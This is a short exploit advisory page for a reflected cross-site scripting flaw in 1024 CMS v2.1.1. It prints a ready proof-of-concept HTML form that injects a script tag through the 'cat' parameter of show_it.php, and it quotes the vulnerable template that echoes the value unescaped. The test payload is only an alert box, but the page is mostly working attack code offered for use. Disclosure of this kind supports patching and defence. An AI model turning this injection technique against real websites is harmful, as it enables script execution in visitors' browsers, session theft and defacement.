1024 CMS v2.1.1 Cross Site Scripting

2017.02.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

*=============================================================| | Exploit Title: 1024 CMS v2.1.1 Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://1024-cms.soft112.com/ | | Download Link :https://sourceforge.net/projects/cms-cvi/files/latest/download?source=typ_redirect | | Version : v2.1.1 | | Tested on: Kali Linux | | Date: 2 /7 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD><TITLE>1024 CMS v2.1.1 Cross Site Scripting</TITLE></HEAD> |<BODY> |<form action="http://127.0.0.1/10/v2.1.1/1024/library/hoteditor/show_it.php" method="gwt"> | <input type="hidden" name="cat" value="Mrsly'"/><ScRiPt>alert('M.R.S.L.Y')</ScRiPt>"/> | <input type="hidden" name="first" value="MRSLY"/> | <input type="hidden" name="page" value="0"/> | <input type="hidden" name="step" value="0"/> |</form> |</BODY> |</HTML> *=======================| |Vulnerable code : | |<table border="0" cellpadding="3" cellspacing="3" style="border-collapse: collapse" width="360" > | <tr> | <td width="68%"><font face=verdana size=1>$display_home_more / $cat2 <font color=red>($total_pic)</font></font></td> | <td width="32%" align="right">$drop_down</td> | </tr> |</table> | *=============================================================| | Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ، | Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، micle | r4ouf ، Net Hacker ، Spoofer ، alcol ، 1TED ، H4554N، shahroukh، Saeid_9n ، | F.SQLi ، Muts ، HackFans، B14CK SPID3R ، MALWaRE43 ، moh3nra021 | And All Of My Friends ... | The Last One : My Self, M.R.S.L.Y *=============================================================|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top